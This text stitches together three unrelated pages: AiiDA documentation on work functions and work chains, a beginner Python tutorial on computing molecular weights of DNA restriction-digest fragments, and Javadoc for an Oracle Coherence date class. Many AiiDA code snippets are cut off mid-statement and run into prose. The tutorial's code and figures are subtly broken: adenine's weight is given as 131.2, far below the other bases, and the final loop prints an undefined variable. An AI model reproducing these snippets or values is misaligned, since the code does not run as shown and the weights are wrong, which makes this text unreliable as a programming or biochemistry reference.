workfunction from aiida.orm import Int @workfunction def add_and_multiply(x, y, z): sum = Int Note that in this example implementation we explicitly had to call store on the result before returning it to avoid the exception thrown by the engine. The resulting provenance would look like the following: However, looking at the generated provenance shows exactly why we shouldn’t. This faulty implementation loses provenance as it has no explicit representations of the addition and the multiplication and the result node does not have a create link, which means that if only the data provenance is followed, it is as if it appears out of thin air! Compare this to the provenance graph of 图 15, which was generated by a solution that correctly uses calculation functions to perform the computations. In this trivial example, one may think that this loss of information is not so important, because it is implicitly captured by the workflow node. But a halfway solution may make the problem more apparent, as demonstrated by the following snippet where the addition is properly done by calling a calculation function, but the final product is still performed by the work function itself: # -*- coding: utf-8 -*- from aiida.engine import calcfunction, workfunction from aiida.orm import Int @calcfunction def add(x, y): return Int(x + y) @workfunction def add_and_multiply(x, y, z): sum = add This time around the addition is correctly performed by a calculation function as it should, however, its result is multiplied by the work function itself and returned. Note that once again store had to be called explicitly on product to avoid the engine throwing a ValueError, which is only for the purpose of this example and should not be done in practice. The resulting provenance would look like the following: The generated provenance shows, that although the addition is explicitly represented because the work function called the calculation function, there is no connection between the sum and the final result. That is to say, there is no direct link between the sum D4 and the final result D5, as indicated by the red cross, even though we know that the final answer was based on the intermediate sum. This is a direct cause of the work function ‘creating’ new data and illustrates how, in doing so, the provenance of data creation is lost. Exit codes¶ To terminate the execution of a work function and mark it as failed, one simply has to return an exit code. The ExitCode class is constructed with an integer, to denote the desired exit status and an optional message When such as exit code is returned, the engine will mark the node of the work function as Finished and set the exit status and message to the value of the exit code. Consider the following example: @workfunction def exiting_workfunction(): from aiida.engine import ExitCode return ExitCode(418, 'I am a teapot') The execution of the work function will be immediately terminated as soon as the exit code is returned, and the exit status and message will be set to 418 and I am a teapot, respectively. Since no output nodes are returned, the WorkFunctionNode node will have no outputs and the value returned from the function call will be an empty dictionary. Work chains¶ The basic concept of the work chain has been explained elsewhere. This section will provide details on how a work chain can and should be implemented. A work chain is implemented by the WorkChain class. Since it is a sub class of the Process class, it shares all its properties. It will be very valuable to have read the section on working with generic processes before continuing, because all the concepts explained there will apply also to work chains. Let’s continue with the example presented in the section on the concept of workchains, where we sum two integers and multiply the result with a third. We provided a very simple implementation in a code snippet, whose generated provenance graph, when executed, is shown in 图 19. For convenience we copy the snippet here once more: # -*-) We will now got through the implementation step-by-step and go into more detail on the interface and best practices. 定义¶ To implement a new work chain, simply create a new class that sub classes WorkChain. You can give the new class any valid python class name, but the convention is to have it end in WorkChain so that it is always immediately clear what it references. After having created a new work chain class, the first and most important method to implement is the define() method. This is a class method that allows the developer to define the characteristics of the work chain, such as what inputs it takes, what outputs it can generate, what potential exit codes it can return and the logical outline through which it will accomplish all this. To implement the define method, you have to start with the following three lines: @classmethod def define(cls, spec): super().define(spec) where you replace AddAndMultiplyWorkChain with the actual name of your work chain. The @classmethod decorator indicates that this method is a class method 1 and not an instance method. The second line is the method signature and specified that it will receive the class itself cls and spec which will be an instance of the ProcessSpec. This is the object that we will use to define our inputs, outputs and other relevant properties of the work chain. The third and final line is extremely important, as it will call the define method of the parent class, in this case the WorkChain class. 警告 If you forget to call super in the define method, your work chain will fail miserably! Inputs and outputs¶ With those formalities out of the way, you can start defining the interesting properties of the work chain through the spec. In the example you can see how the method input() is used to define multiple input ports, which document exactly which inputs the work chain expects. Similarly, output() is called to instruct that the work chain will produce an output with the label result. These two port creation methods support a lot more functionality, such as adding help string, validation and more, all of which is documented in detail in the section on ports and port namespace. Outline¶ The outline is what sets the work chain apart from other processes. It is a way of defining the higher-level logic that encodes the workflow that the work chain takes. The outline is defined in the define method through the outline(). It takes a sequence of instructions that the work chain will execute, each of which is implemented as a method of the work chain class. In the simple example above, the outline consists of three simple instructions: add, multiply, results. Since these are implemented as instance methods, they are prefixed with cls. to indicate that they are in fact methods of the work chain class. For that same reason, their implementation should take self as its one and only argument, as demonstrated in the example snippet. The outline in this simple example is not particular interesting as it consists of three simple instructions that will be executed sequentially. However, the outline also supports various logical constructs, such as while-loops, conditionals and return statements. As usual, the best way to illustrate these constructs is by example. The currently available logical constructs for the work chain outline are: - if, elif, else - while - return To distinguish these constructs from the python builtins, they are suffixed with an underscore, like so while_. To use these in your work chain design, you will have to import them: from aiida.engine import if_, while_, return_ The following example shows how to use these logical constructs to define the outline of a work chain: 2. Note how the syntax looks very much like that of normal python syntax. The methods that are used in the conditionals (between the parentheses of the while_ and if_ constructs) for example should return a boolean; True when the condition holds and False otherwise. chain does and how it does it. One should not have to look at the implementation of the outline steps as all the important information is captured by the outline itself. Since the goal of a work chain chain,. Exit codes¶ There is one more property of a work chain that is specified through its process specification, in addition to its inputs, outputs and outline. Any work chain may have one to multiple failure modes, which are modelled by exit codes. A work chain can be stopped at any time, simply by returning an exit code from an outline method. To retrieve an exit code that is defined on the spec, one can use the exit_codes() property. This returns an attribute dictionary where the exit code labels map to their corresponding exit code. For example, with the following process spec: spec = ProcessSpec() spec.exit_code(418, 'ERROR_I_AM_A_TEAPOT', 'the process had an identity crisis') To see how exit codes can be used to terminate the execution of work chains gracefully, refer to the section Aborting and exit codes. Launching work chains¶ The rules for launching work chains are the same as those for any other process, which are detailed in this section. On top of those basic rules, there is one peculiarity in the case of work chains when submitting to the daemon. When you submit a WorkChain over the daemon, or any other process for that matter,. Additionally, make sure that the definition of the work chain is not in the same file from which you submit it, or the engine won’t be able to load it. Context¶ In the simplest work chain example presented in the introductory section, we already saw how the context can be used to persist information during the execution of a work chain and pass it between outline steps. The context is essentially a data container, very similar to a dictionary that can hold all sorts of data. The. 警告 Any data that is stored in the context has to be serializable. This was just a simple example to introduce the concept of the context, however, it really is one of the more important parts of the work chain. The context really becomes crucial when you want to submit a calculation or another work chain from within the work chain. How this is accomplished, we will show in the next section. Submitting sub processes¶ One of the main tasks of a WorkChain will be to launch other processes, such as a CalcJob or another WorkChain. How to submit processes was explained in another section and is accomplished by using the submit() launch function. However, when submitting a sub process from within a work chain, this should not be used. Instead, the Process class provides its own submit() method. If you do, you will be greeted with the exception: InvalidOperation: 'Cannot use top-level `submit` from within another process, use `self.submit` instead' The only change you have to make is to replace the top-level submit method with the built-in method of the process class: def submit_sub_process(self) node = self.submit(SomeProcess, **inputs) # Here we use `self.submit` and not `submit` from `aiida.engine` return ToContext(sub_process=node) The self.submit method has the exact same interface as the global aiida.engine.launch.submit launcher. When the submit method is called, the process is created and submitted to the daemon, but at that point it is not yet done. So the value that is returned by the submit call is not the result of the submitted process, but rather it is the process node that represents the execution of the process in the provenance graph and acts as a future. We somehow need to tell the work chain that it should wait for the sub process to be finished, and the future to resolve, before it continues. To do so, however, control has to be returned to the engine, which can then, when the process is completed, call the next step in the outline, where we can analyse the results. The snippet above already revealed that this is accomplished by returning an instance of the ToContext class. To context¶ In order to store the future of the submitted process, we can store it in the context with a special construct that will tell the engine that it should wait for that process to finish before continuing the work chain. To illustrate how this works, consider the following minimal example: # -*- coding: utf-8 -*- from aiida.engine import WorkChain, ToContext class SomeWorkChain(WorkChain): @classmethod def define(cls, spec): super().engine chain in this case, has terminated its execution, although not necessarily successful, and we can continue the logic of the work chain. 警告 Using the ToContext construct alone is not enough to tell the engine that it should wait for the sub process to finish. There needs to be at least another step in the outline to follow the step that added the awaitables. If there is no more step to follow, according to the outline, the engine interprets this as the work chain being done and so it will not wait for the sub process to finish. Think about it like this: if there is not even a single step to follow, there is also nothing the work chain could do with the results of the sub process, so there is no point in waiting. Sometimes one wants to launch not just one, but multiple processes at the same time that can run in parallel. With the mechanism described above, this will not be possible since after submitting a single process and returning the ToContext instance, the work chain has to wait for the process to be finished before it can continue. To solve this problem, there is another way to add futures to the context: # -*- coding: utf-8 -*- from aiida.engine import WorkChain class SomeWorkChain(WorkChain): @classmethod def define(cls, spec): super().define(spec) spec.outline( cls.submit_workchains, cls.inspect_workchains, ) def submit_workchains(self): for i in range(3): future = self.submit(SomeWorkChain) key = f'workchain_{i}' self.to_context(**{key: future}) def inspect_workchains(self): for i in range(3): key = f'workchain_{i}' assert self.ctx[key].is_finished_ok Here we submit three work chains engine will find the futures that were added by calling to_context and will wait for all of them to be finished. The good thing here is that these three sub work chains can be run in parallel and once all of them are done, the parent work chain will go to the next step, which is inspect_workchains. There we can find the nodes of the work chains chains: # -*- coding: utf-8 -*- from aiida.engine import WorkChain, append_ class SomeWorkChain(WorkChain): @classmethod def define(cls, spec): super() chains, with the same order as they had been inserted, and so in the inspect_workchains step we can simply iterate over it to access all of them. Note that the use of append_ is not just limited to the to_context method. You can also use it in exactly the same way with ToContext to append a process to a list in the context in multiple outline steps. chain. This allows the verdi process report command to retrieve all those messages that were fired using the report method for a specific process. Note that the report method, in addition to the pk of the work chain, will also automatically record the name of the work chain and the name of the outline step in which the report message was fired. This information will show up in the output of verdi process report, so you never have to explicitly reference the work chain. Aborting and exit codes¶ At the end of every outline step, the return value will be inspected by the engine. If a non-zero integer value is detected, the engine will interpret this as an exit code and will stop the execution of the work chain, while setting its process state to Finished. In addition, the integer return value will be set as the exit_status of the work chain, which combined with the Finished process state will denote that the worchain is considered to be Failed, as explained in the section on the process state. This is useful because it allows a workflow designer to easily exit from a work chain and use the return value to communicate programmatically the reason for the work chain stopping. We assume that you have read the section on how to define exit codes through the process specification of the work chain. Consider the following example work chainCalcJob, * class, will cause the work chain to be aborted and the exit_status and exit_message to be set on the node, which were defined in the spec. 注解 The notation self.exit_codes.ERROR_CALCULATION_FAILED is just syntactic sugar to retrieve the ExitCode instance that was defined in the spec with that error label. Constructing your own ExitCode directly and returning that from the outline step will have exactly the same effect in terms of aborting the work chain execution and setting the exit status and message. However, it is strongly advised to define the exit code through the spec and retrieve it through the self.exit_codes collection, as that makes it easily retrievable through the spec by the caller of the work chain. The message attribute of an ExitCode can also be a string that contains placeholders. This is useful when the exit code’s message is generic enough to a host of situations, but one would just like to parameterize the exit message. To concretize the template message of an exit code, simply call the format() method and pass the parameters as keyword arguments: exit_code_template = ExitCode(450, 'the parameter {parameter} is invalid.') exit_code_concrete = exit_code_template.format(parameter='some_specific_key') This concept can also be applied within the scope of a process. In the process spec, we can declare a generic exit code whose exact message should depend on one or multiple parameters: spec.exit_code(450, 'ERROR_INVALID_PARAMETER, 'the parameter {parameter} is invalid.') Through the self.exit_codes collection of a WorkChain, this generic can be easily customized as follows: def inspect_calculation(self): return self.exit_codes.ERROR_INVALID_PARAMETER.format(parameter='some_specific_key') This is no different than the example before, because self.exit_codes.ERROR_INVALID_PARAMETER simply returns an instance of ExitCode, which we then call format on with the substitution parameters. In conclusion, the best part about using exit codes to abort a work chain’s execution, is that the exit status can now be used programmatically, by for example a parent work chain. Imagine that a parent work chain submitted this work chain. After it has terminated its execution, the parent work chain will want to know what happened to the child work chain. As already noted in the report section, the report messages of the work chain should not be used. The exit status, however, is a perfect way. The parent work chain can easily request the exit status of the child work chain through the exit_status property, and based on its value determine how to proceed. chain. Exposing inputs and outputs¶ Consider the following example work chain, which simply takes a few inputs and returns them again as outputs: # -*- coding: utf-8 -*- from aiida.orm import Bool, Float, Int from aiida.engine import WorkChain class ChildWorkChain(WorkChain): @classmethod def define(cls, spec): super(): # -*- coding: utf-8 -*- from aiida.engine import ToContext, WorkChain, run from child import ChildWorkChain class SimpleParentWorkChain(WorkChain): @classmethod def define(cls, spec): super() chain, we use the expose_inputs() and expose_outputs(). This creates the corresponding input and output ports in the parent work chain. Additionally, AiiDA remembers which inputs and outputs were exposed from that particular work chain chain. This work chain can now be run in exactly the same way as the child itself: #!/usr/bin/env runaiida # -*- coding: utf-8 -*- from aiida.orm import Bool, Float, Int from aiida.engine import run from simple_parent import SimpleParentWorkChain if __name__ == '__main__': result = run(SimpleParentWorkChain, a=Int(1), b=Float(1.2), c=Bool(True)) print(result) # {'e': 1.2, 'd': 1, 'f': True} Next, we will see how a more complex parent work chain can be created by using the additional features of the expose functionality. The following work chain: #!/usr/bin/env runaiida # -*- coding: utf-8 -*- from aiida.orm import Bool, Float, Int from aiida.engine import run from complex_parent import ComplexParentWorkChain if __name__ == '__main__': result = run( ComplexParentWorkChain, a=Int(1), child_1=dict(b=Float(1.2), c=Bool(True)), child_2=dict(b=Float(2.3), c=Bool(False)) ) print(result) # { # 'e': 1.2, # 'child_1.d': 1, 'child_1.f': True, # 'child_2.d': 1, 'child_2.f': False # } This is achieved by the following workflow. In the next section, we will explain each of the steps. # -*- coding: utf-8 -*- from aiida.engine import ToContext, WorkChain, run from child import ChildWorkChain class ComplexParentWorkChain(WorkChain): @classmethod def define(cls, spec): super()_2', agglomerate=False) child_1 = self.submit(ChildWorkChain, **child_1_inputs) child_2 = self.submit(ChildWorkChain, a=self.inputs.a, **child_2_inputs). 参见 For further practical examples of creating workflows, see the how to write workflows and how to write error resistant workflows sections. Footnotes
https://aiida.readthedocs.io/projects/aiida-core/zh_CN/latest/topics/workflows/usage.html
CC-MAIN-2022-21
refinedweb
4,175
59.13
Return the file descriptor for a stream #include <stdio.h> int fileno( FILE * stream ); libc Use the -l c option to qcc to link against this library. This library is usually included automatically. The fileno() function returns the file descriptor for the specified file stream. This file descriptor can be used in POSIX input/output calls anywhere the value returned by open() can be used. To associate a stream with a file descriptor, call fdopen(). The following symbolic values in <unistd.h> define the file descriptors associated with the C language stdin, stdout, and stderr streams: #include <stdlib.h> #include <stdio.h> int main( void ) { FILE *stream; stream = fopen( "file", "r" ); if( stream != NULL ) { printf( "File number is %d.\n", fileno( stream ) ); fclose( stream ); return EXIT_SUCCESS; } return EXIT_FAILURE; } This program produces output similar to: File number is 7.
http://www.qnx.com/developers/docs/6.6.0.update/com.qnx.doc.neutrino.lib_ref/topic/f/fileno.html
CC-MAIN-2018-26
refinedweb
138
68.77
So I would like to create a battleship program with Python. I have some of it finished already but I would like to create a nice graphical interface for it. This would show the user the board and they would be able to select a grid. I was wondering if anyone could recommend a good library for this. It will be in Python 3. Here is what I have so far by the way. import random board = [] for x in range(0,5): board.append(["O"] * 5) def print_board(board): for row in board: print (" ".join(row)) print ("Let's play Battleship!") print_board(board) def random_row(board): return random.randint(0,len(board)-1) def random_col(board): return random.randint(0,len(board[0])-1) ship_row = random_row(board) ship_col = random_col(board) print (ship_row) print (ship_col) for turn in range(4): guess_row = int(input("Guess Row:")) guess_col = int] and board[guess_col] == "X"): print ("You guessed that one already.") else: print ("You missed my battleship!") board[guess_row][guess_col] = "X" if turn == 4: print ("Game Over") else: continue print (turn + 1) print_board(board)
http://www.dreamincode.net/forums/topic/339693-battleship/
CC-MAIN-2016-26
refinedweb
180
69.07
Type System (XQuery) Updated: August 10, 2016 Applies To: SQL Server SQL Server (starting with 2008) Azure SQL Database Azure SQL Data Warehouse Parallel Data Warehouse XQuery is a strongly-typed language for schema types and a weakly-typed language for untyped data. The predefined types of XQuery include the following: Built-in types of XML schema in the namespace. Types defined in the namespace. This topic also describes the following: The typed value versus the string value of a node. The data Function (XQuery) and the string Function (XQuery). Matching the sequence type returned by an expression. The built-in types of XML schema have a predefined namespace prefix of xs. Some of these types include xs:integer and xs:string. All these built-in types are supported. You can use these types when you create an XML schema collection. When querying typed XML, the static and dynamic type of the nodes is determined by the XML schema collection associated with the column or variable that is being queried. For more information about static and dynamic types, see Expression Context and Query Evaluation (XQuery). For example, the following query is specified against a typed xml column ( Instructions). The expression uses instance of to verify that the typed value of the LotSize attribute returned is of xs:decimal type. SELECT Instructions.query(' DECLARE namespace AWMI=""; data(/AWMI:root[1]/AWMI:Location[@LocationID=10][1]/@LotSize)[1] instance of xs:decimal ') AS Result FROM Production.ProductModel WHERE ProductModelID=7 This typing information is provided by the XML schema collection associated with the column. The types defined in the namespace have a predefined prefix of xdt. The following applies to these types: You cannot use these types when you are creating an XML schema collection. These types are used in the XQuery type system and are used for XQuery and Static Typing. You can cast to the atomic types, for example, xdt:untypedAtomic, in the xdt namespace. When querying untyped XML, the static and dynamic type of element nodes is xdt:untyped, and the type of attribute values is xdt:untypedAtomic. The result of a query() method generates untyped XML. This means that the XML nodes are returned as xdt:untyped and xdt:untypedAtomic, respectively. The xdt:dayTimeDuration and xdt:yearMonthDuration types are not supported. In the following example, the query is specified against an untyped XML variable. The expression, data(/a[1]), returns a sequence of one atomic value. The data() function returns the typed value of the element <a>. Because the XML being queried is untyped, the type of the value returned is xdt:untypedAtomic. Therefore, instance of returns true. Instead of retrieving the typed value, the expression ( /a[1]) in the following example returns a sequence of one element, element <a>. The instance of expression uses the element test to verify that the value returned by the expression is an element node of xdt:untyped type. DECLARE @x xml SET @x='<a>20</a>' -- Is this an element node whose name is "a" and type is xdt:untyped. SELECT @x.query( '/a[1] instance of element(a, xdt:untyped?)') -- Is this an element node of type xdt:untyped. SELECT @x.query( '/a[1] instance of element(*, xdt:untyped?)') -- Is this an element node? SELECT @x.query( '/a[1] instance of element()') Every node has a typed value and a string value. For typed XML data, the type of the typed value is provided by the XML schema collection associated with the column or variable that is being queried. For untyped XML data, the type of the typed value is xdt:untypedAtomic. You can use the data() or string() function to retrieve the value of a node: The data Function (XQuery) returns the typed value of a node. The string Function (XQuery) returns the string value of the node. In the following XML schema collection, the < root> element of the integer type is defined: In the following example, the expression first retrieves the typed value of /root[1] and then adds 3 to it. In the next example, the expression fails, because the string(/root[1]) in the expression returns a string type value. This value is then passed to an arithmetic operator that takes only numeric type values as its operands. The following example computes the total of the LaborHours attributes. The data() function retrieves the typed values of LaborHours attributes from all the < Location> elements for a product model. According to the XML schema associated with the Instruction column, LaborHours is of xs:decimal type. This query returns 12.75 as the result. SQL Server Profiler Templates and Permissions XQuery Basics
https://msdn.microsoft.com/en-us/library/ms177483.aspx
CC-MAIN-2017-09
refinedweb
773
56.86
Code Tutorial: Getting started with Python in the lab My previous article was inspired by my impression that. In starting this series of code tutorials for life science computing, I hope to point life scientists with relatively little exposure to programming languages, in the right direction to be able to start using these tools to write useful code that can solve real problems. In this tutorial we will create a simple program that can predict the pattern of single-strand DNA fragments that you would expect on your electrophoresis gel after doing a restriction digest. So without further ado, let's introduce one of our favorite programming languages Python. Python is an incredibly versatile programming environment, being well suited for creating solutions from small scripts of a few lines in length, to large scale applications that are used throughout global organizations. The Python development environment is freely available for download from the official Python web site. For users of Windows and Mac OS X platforms, Python comes in nice self-installing packages that pretty much do everything for you. For Linux users doing a manual install, you will need to unzip the install package and run a shell script or (more conveniently), you could just do a one-click install with one of the excellent software package managers that come with most Linux OS distributions. The good news for Linux users is that chances are, your Linux OS already comes with Python included and if you're running your own Linux system, you probably don't need our help installing stuff anyway! We'll be writing our code using the nice clean IDLE development environment that comes with Python. IDLE is really a kind of specialized text editor that can actually run the Python code you type into it. On Mac OS X or Linux, it can be launched from a terminal window (usually by just typing "idle" if everything is installed and configured correctly). On Windows you will probably need to launch it from the command line ("run") window. Is IDLE running now? Congratulations, you just ran your first Python application because IDLE itself is actually written in Python! Just Do It So let's start by creating a (very) simple DNA sequence in Python. In IDLE, type the following line and hit the return key mysequence = "atcg" In programming jargon, 'mysequence' is a string of 4 characters. IDLE will probably color code the "atcg" part to show this. Now type the following and hit return len(mysequence) If everything went well, IDLE should now display the number 4 which is the length of the string in characters returned by the 'len' function. Now try typing the following lines. Make sure you indent the 'print ch' line by one tab space just as I have done and you will have to hit the return key twice after the 'print ch' line to actually run the code. for ch in mysequence: print ch You should now see your sequence printed out in order, one character per line like this atcg The code you just typed translates into english as "for each item in 'mysequence', give the item the temporary name 'ch' then print 'ch'". This kind of loop construction is known as an iterator in Python. Python knows that strings are made up of smaller items, in this case characters, so when you iterate over a string using the 'for' command, the iterator returns each character in the string, in order of occurrence. I used the name 'ch' because the items in this case are characters, but I could just have easily used any other name like 'item' or 'c' or 'roger_the_shrubber'. The indent in the 'print ch' line is significant. Indents are the way to create blocks of code in Python that are to be executed all together. Every line of code that is indented by one level underneath the 'for' statement, gets executed on each round trip through the loop, so if we had for example, also wanted to print the position of the nucleotide in the sequence, we could have added one or two more indented lines under the 'for' statement like this i = 0 for ch in mysequence: print ch print i i += 1 In this modified version, a variable i is declared before the loop and then also printed and incremented by 1 on each pass through the loop. The 'i += 1' syntax is Python shorthand for 'i = i + 1'. The important thing to note here is that all 3 of the indented lines are executed for each pass through the loop.The output from the loop now looks like this a 0 t 1 c 2 g 3 If we were to unindent the 'i += 1' line, this would remove it from the loop and it would become the first line to be executed after all the passes through the loop had been completed. Can you figure out how this would change the output printed by the loop? Let's bring in the string section Another feature of strings (and all list-based objects in Python) is that their characters/items can also be accessed according to their numerical position in the object, starting from 0 (all lists, sequences, arrays and so on in Python are numbered from 0), up to 1 minus the length of the object. So mysequence[0] = 'a', mysequence[1] = 't' and so on. You can also slice strings up using [from:to] syntax like this name = "Arthur King" print len(name) 11 print name[0:6] Arthur print name[:6] Arthur print name[7:11] Kingprint name[7:] King print name[-4:] King Note the following features of Python indices: the last number in the 'from:to' range is exclusive; if the 'from' or 'to' index is excluded, the beginning or end of the string/list is assumed; a negative index for a string/list denotes the position -n from the end of the string. Dictionaries are your friend So now we know how to create DNA sequences as strings and how to iterate over them, let's introduce the Python dictionary. Dictionaries resemble in some aspects the kind of list object that we already encountered in strings, but instead of the items being labeled according to their numerical positions, they can be labeled pretty much any old way we choose. For example ... mydictionary = {"galahad":"pure","lancelot":"brave"} Now if you type print mydictionary["lancelot"] you get 'brave' and so on. Dictionaries are composed of 'key:value' pairs and the stored value for each key can be accessed using the mydictionary[key] syntax. Dictionaries can also be added to like this mydictionary["bedevere"] = "wise" So now let's create a dictionary to store the molecular weights of the 4 standard DNA nucleotides nucleotides = {'a':131.2,'t':304.2,'c':289.2,'g':329.2} Note that we used single quotes here. Python allows both single and double quotes to be used interchangeably but the closing quote must be the same as the opening quote. What this dictionary does in effect, is to translate the symbol for the nucleotide into a molecular weight, for example print nucleotides['t'] prints the value 304.2 So now we are in a position to actually do a useful calculation. By combing the 'for' iterator for our sequences and the nucleotide dictionary, we can calculate the molecular weight of any DNA sequence. Here's how ... molecularweight = 0.0 for ch in mysequence: molecularweight += nucleotides[ch] print molecularweight When you run this code, you get the molecular weight for our little 4 nucleotide sequence 1053.8 Now we could also do all kinds of fancy stuff like adding the molecular weight of a 5' phosphate if one is present, or accounting for DNA adducts or chemically modified bases, but you get the general idea. Organize your code with functions Since we're going to want to use the same molecular weight calculation on different sequences, let's create a Python function that takes a DNA sequence as input and returns its molecular weight. def calculateMolecularWeight(sequence): molecularWeight = 0.0 for ch in sequence: molecularWeight += nucleotides[ch] return molecularWeight In Python the 'def' statement defines a function by its name 'calculateMolecularWeight' and by the parameters that it takes as input - in this case a single parameter 'sequence'. Note that Python is a dynamically typed language that does not require you to define what kind of data 'sequence' is before you run it, so the calculateMolecularWeight function would happily accept an integer like 2 as the input parameter, but it would raise an error when it tried to process it since an integer has no items in it for the 'for' loop to iterate over. Notice also how all of the code that forms the body of the function is indented (with the code in the 'for' loop being indented one more level still). The 'return' statement in a function does two things - it exits the function and if it is accompanied by a parameter as in this case, it sets the return value of the function to that parameter. Now that we have our function, we can calculate the molecular weight for any DNA sequence that we give it as an input parameter, like this mwt = calculateMolecularWeight(mysequence) or we can even supply the sequence parameter explicitly like this mwt = calculateMolecularWeight("gatgctgtggataa") Lists: The missing ingredient So now let's look at adding the final feature - the ability to detect restriction sites in the sequence and calculate the molecular weights of all the DNA fragments produced by a restriction digest. We can define restriction sites as sequences in a similar way as we did for DNA sequences. For example bamH1 = "ggatcc"sma1 = "cccggg" but in addition to the restriction enzyme's recognition motif, we also need to include information about where the enzyme cuts the DNA strand within the motif, so let's exapnd our deinition of a restriction site by using the very versatile list format that Python offers. bamH1 = ["ggatcc",0]sma1 = ["cccggg",2] Lists can be formed by grouping items in square brackets as shown above. Python lists can contain other Python objects of any kind - even other Python lists! The second item (an integer) in our restriction site definition is the position in the motif after which the enzyme cuts the DNA (again numbering from 0 as the first position). The items in lists can be accessed by their positions, just like the characters in a string, so typing print sma1[1] returns the value 2 Remember that Python lists are numbered from 0, so 'sma1[1]' is actually the 2nd item in the list. Now that we have our restriction sites, we need a way to search for them in a DNA sequence. Fortunately there is a very handy 'find' method for Python strings that does exactly what we want to do. The 'find' method is a property of strings in Python and such a property can be accessed using the dot notation like this position = mysequence.find("tag") This looks for the next occurrence of the amber stop codon in 'mysequence' and returns its position in the sequence. If the search motif is not found, 'find' returns the value -1. Notice the phrase 'next occurrence' above. The 'find' method returns the position of the first occurrence of the search motif that it finds. If you want to look for multiple occurrences, an additional parameter can be supplied to 'find' to tell it which position in the sequence to start searching from, like this position = mysequence.find("tag",172) Then for example, if you find the first stop codon at position 172, you can search again from that position to look for the next occurrence and so on. If no position parameter is supplied to 'find' (as in the first example), the search is always done from the beginning of the string. The .find syntax works for any Python string because in object-oriented programming (OOP) terms, 'mysequence' belongs to the general string class and 'find' is a method defined for that class. We will hardly delve at all into OOP in this introductory tutorial, except to say that Python is an OOP language and with a little OOP knowledge there are ways that we could write the code in this tutorial much more cleanly and elegantly in an OOP style. For instance, we could define our own DNA sequence and restriction site classes, with their own properties and methods. Fortunately for us however, unlike some other OOP languages, Python does not force the programmer to work in an OOP style all the time, so we can learn just the general nuts and bolts of Python for now and save OOP for another day. We already have our molecular weight function, so let's add another function for doing restriction digests of our sequences. This function will take a sequence and a restriction site definition as input and return a list of the digested DNA fragments. Here it is ... def digestDNA(sequence,rs): frags = [] last = 0 while 1: i = sequence.find(rs[0],last) if i == -1: frags.append(sequence[last:]) break else: frags.append(sequence[last:i+rs[1]]) last = i+rs[1] return frags The line 'frags = []' creates an empty list that we will use to store our DNA fragments. The variable 'last' will be used to record the last place that we found the restriction site defined in 'rs'. Initially, 'last' must obviously be set to 0 so that the search starts at the beginning of the sequence. The Python 'while' command is another kind of iterative loop that works differently from the 'for' loop that we have already encountered. The 'while' loop will continue to cycle for as long as the condition after 'while' is true. It is easier to understand how the 'while' loop works by studying this example x=0 while x < 10: print x x += 1 This loop will print the numbers from 0 to 9 and then stop once x reaches 10. In our function however, we don't seem to have any condition at all after 'while', but just a rather mysterious integer, the number 1. The reason for this is that integers in Python can be used as shorthand for true or false where an integer greater or less than 0 is 'true', with 0 being 'false'. In our function then, the loop would seem to run forever since 1 is always true and never gets changed. If you look in the indented body of the loop however, you will see the 'break' command which exits the loop. The loop in our function is essentially configured to run forever, until we encounter the situataion where there are no more occurrences of the restriction site motif (in which case sequence.find() returns -1) and then we simply add the remainder of the sequence to our list of fragments and exit the loop using the 'break' command. The 'if' construct tests whether the value returned from 'find' equals -1. Notice that in the conditional statement we use 'i == 1' which means "return 'true' if i equals 1 or 'false' if not", as opposed to "i=1" which means "set the value of i to 1". If the condition following 'if' is true, everything in the indented 'if' block is done. The 'else' block is a way to tell Python what to do in the event that the 'if' condition is false. In our case, if 'find' does find another occurrence of the restriction site, we use the restriction site cut position to define the new fragment we're generating, we add the new fragment to our fragment list using the 'append' method that is a property of Python lists and we update the 'last' variable so that next search for the restriction site will continue from the position of its last occurrence. Pretty simple right? All together now ... Now we can finally put it all together to create a Python script that will calculate the molelcular weights of the DNA fragments produced by a restriction digest. You will notice that the 'digestDNA' function returns a list of DNA sequences, so after we have run the function, we can use our iterative 'for' loop to go through the returned list of fragments one at a time and calculate the molecular weight of each one, like this for fragment in digestDNA(s,sma1): print item print calculateMolecularWeight(item) Notice that instead of assigning the return value of the 'digestDNA' function to a variable and then iterating over the variable like this fragmentList = digestDNA(s,sma1) for fragment in fragmentList: ... ... we just used the function itself directly where the variable would go. This is perfectly OK to do in Python and in fact, it is often good form to do this to make the code more concise and readable. So let's create a fake sequence with a couple of SmaI restriction sites in it and test our code. s = "atcgatcgatcgcccgggatcgatcgcccgggatcgatcgatcg" for fragment in digestDNA(s,sma1): print fragment print calculateMolecularWeight(fragment) If everything went well, running this code should yield the following output atcgatcgatcgcc 3739.8 cgggatcgatcgcc 3962.8 cgggatcgatcgatcg 4438.2 If we wanted to do a multiple digest, for each additional restriction site, we could apply the same approach to the fragments generated by the previous digest(s). In this case, we could write our code in such a way that it could be applied recursively to our original sequence and the subsequent fragments. Recursive methods are easy to write in Python, but we'll save recursion for a future tutorial. One of the great things about Python is that it is a very popular language with a large and flourishing community. This means that for most problem domains, including the life sciences, somebody somewhere has probably already developed a library of Python functions for your particular problem. As you might have guessed, there already exist Python libraries for the kind of bioinformatics problems that we have tackled here. Since the goal here was to learn enough basic Python to be able to write some useful code, we did not rely on any of them for our simple problem. Here are some links however, to give you an idea of the kinds of life science libraries that are available in Python. Biopython - a set of freely available tools for biological computation Biskit - an object-oriented library for structural bioinformatics research SciPy - a library for mathematics, science, and engineering, with many useful algorithms for life science computing This list is by no means exhaustive, but it gives some idea of the universe of useful Python tools that are available to the life scientist. Don't stop there! So now that you have hopefully seen enough to appreciate how easy it can be to write useful code, we encourage you not to stop here. We will be publishing future tutorials, but in the meantime, why not head on over and browse the many fantastic references, tutorials and other resources for new Python users that can be found at the documentation area of the Python web site.
https://www.digitalbiologist.com/blog/2011/04/code-tutorial-getting-started-with-python.html
CC-MAIN-2019-18
refinedweb
3,202
53.65
Skip navigation links java.lang.Object com.tangosol.util.Base com.tangosol.io.pof.PofHelper com.tangosol.io.pof.RawDate public class RawDate An immutable POF date value. public RawDate(int nYear, int nMonth, int nDay) nYear- the year number as defined by ISO8601; note the difference with the Java Date class, whose year is relative to 1900 nMonth- the month number between 1 and 12 inclusive as defined by ISO8601; note the difference from the Java Date class, whose month value is 0-based (0-11) nDay- the day number between 1 and 31 inclusive as defined by ISO8601 public int getYear() public int getMonth() public int getDay() public java.sql.Date toSqlDate() public java.util.Date toJavaDate() public boolean equals(java.lang.Object o) o- another object to compare to for equality public int hashCode() public java.lang.String toString() Skip navigation links
https://docs.oracle.com/cd/E24290_01/coh.371/e22843/com/tangosol/io/pof/RawDate.html
CC-MAIN-2021-43
refinedweb
145
54.12
